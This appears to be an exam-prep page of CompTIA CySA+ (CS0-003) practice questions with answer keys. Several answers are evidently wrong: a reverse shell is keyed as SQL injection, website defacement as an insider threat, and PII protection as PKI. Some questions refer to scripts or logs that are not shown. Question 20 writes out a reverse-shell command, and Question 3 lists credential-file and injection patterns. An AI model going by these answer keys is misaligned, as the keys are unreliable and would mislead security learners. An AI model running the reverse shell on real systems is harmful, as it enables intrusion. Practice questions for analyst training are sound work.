CompTIA CS0-003 Certification Exam Questions & Answers, CompTIA Cybersecurity Analyst (CySA+) | SPOTO

Prepare for the CompTIA CS0-003 Certification Exam with our comprehensive collection of practice tests. Our platform offers a diverse range of exam materials, including free tests, sample questions, mock exams, and more. Access exam questions and answers curated by experts in the field to enhance your exam preparation. Utilize our online exam simulator to simulate real exam scenarios and gauge your readiness. With our exam dumps, you'll gain valuable insights into the exam structure and content, ensuring confidence on exam day. Whether you're seeking to reinforce your knowledge or familiarize yourself with exam patterns, our practice tests provide the ideal resource for success in the CompTIA Cybersecurity Analyst (CySA+) certification exam.

Question #1
Which of the following organizational initiatives would be MOST impacted by data sovereignty issues?
A. Moving to a cloud-based environment
B. Migrating to locally hosted virtual servers
C. Implementing non-repudiation controls
D. Encrypting local database queries
View answer
Correct Answer: C
Question #2
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?
A. PowerShell
B. Ruby
C. Python
D. Shell script
View answer
Correct Answer: A
Question #3
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
View answer
Correct Answer: A
Question #4
Which of the following is the BEST way to gather patch information on a specific server?
A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD
View answer
Correct Answer: D
Question #5
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
View answer
Correct Answer: C
Question #6
An organization has the following risk mitigation policy: Risks with a probability of 95% or greater will be addressed before all others regardless of the impact. All other prioritization will be based on risk value. The organization has identified the following risks: Which of the following is the order of priority for risk mitigation from highest to lowest?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
View answer
Correct Answer: C
Question #7
Given the following CVSS string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Which of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability
B. The vulnerability is network based
C. The vulnerability does not affect confidentiality
D. The complexity to exploit the vulnerability is high
View answer
Correct Answer: B
Question #8
While reviewing web server logs, a security analyst found the following line: Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
View answer
Correct Answer: D
Question #9
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. Shut the network down immediately and call the next person in the chain of command
B. Determine what attack the odd characters are indicative of
C. Utilize the correct attack framework and determine what the incident response will consist of
D. Notify the local law enforcement for incident response
View answer
Correct Answer: D
Question #10
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
View answer
Correct Answer: A
Question #11
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
View answer
Correct Answer: A
Question #12
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has created the initial evidence log, disabled the wireless adapter on the device, interviewed the employee (who was unable to identify the website that was accessed), and reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware
B. Install an additional malware scanner that will send email alerts to the analyst
C. Configure the system to use a proxy server for Internet access
D. Delete the user profile and restore data from backup
View answer
Correct Answer: A
Question #13
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?
A. Implement a secure supply chain program with governance
B. Implement blacklisting for IP addresses from outside the country
C. Implement strong authentication controls for all contractors
D. Implement user behavior analytics for key staff members
View answer
Correct Answer: A
Question #14
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
A. SCADA
B. CAN bus
C. Modbus
D. IoT
View answer
Correct Answer: A
Question #15
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
A. Join an information sharing and analysis center specific to the company's industry
B. Upload threat intelligence to the IPS in STIX/TAXII format
C. Add data enrichment for IPS in the ingestion pipeline
D. Review threat feeds after viewing the SIEM alert
View answer
Correct Answer: A
Question #16
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a"; }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b"; }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c"; }
View answer
Correct Answer: A
Question #17
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
B. CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
View answer
Correct Answer: A
Question #18
While reviewing incident reports from the previous night, a security analyst notices the corporate websites were defaced with political propaganda. Which of the following BEST describes this type of actor?
A. Hacktivist
B. Nation-state
C. Insider threat
D. Organized crime
View answer
Correct Answer: C
Question #19
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
View answer
Correct Answer: D
Question #20
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>&1 Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
View answer
Correct Answer: D
Question #21
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. A TXT record on the name server for SPF
B. DNSSEC keys to secure replication
C. DomainKeys Identified Mail
D. A sandbox to check incoming mail
View answer
Correct Answer: B
Question #22
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
A. CASB
B. VPC
C. Federation
D. VPN
View answer
Correct Answer: C
Question #23
Which of the following best describes the key elements of a successful information security program?
A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset classification
C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems
View answer
Correct Answer: A
Question #24
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info"; }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }
View answer
Correct Answer: D
Question #25
An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?
A. Perform a tabletop drill based on previously identified incident scenarios
B. Simulate an incident by shutting down power to the primary data center
C. Migrate active workloads from the primary data center to the secondary location
D. Compare the current plan to lessons learned from previous incidents
View answer
Correct Answer: B
Question #26
Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe's PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
View answer
Correct Answer: B
Question #27
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. PAM
B. IDS
C. PKI
D. DLP
View answer
Correct Answer: C
Question #28
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications
View answer
Correct Answer: A
Question #29
A company's Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the company's business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?
A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to the cloud
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest
View answer
Correct Answer: C
Question #30
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture: Which of the following generated the above output?
A. A port scan
B. A TLS connection
C. A vulnerability scan
D. A ping sweep
View answer
Correct Answer: D
Question #31
A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: DNS traffic while a tunneling session is active; the mean time between queries is less than one second; and the average query length exceeds 100 characters. Which of the following attacks most likely occurred?
A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning
View answer
Correct Answer: D
Question #32
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall
C. Perform a historical trend analysis and look for similar scanning activity
D. Block the specific IP address of the scans at the network firewall
View answer
Correct Answer: A
Question #33
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:
A. vulnerability scanning
B. threat hunting
C. red teaming
D. penetration testing
View answer
Correct Answer: B
Question #34
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
View answer
Correct Answer: B
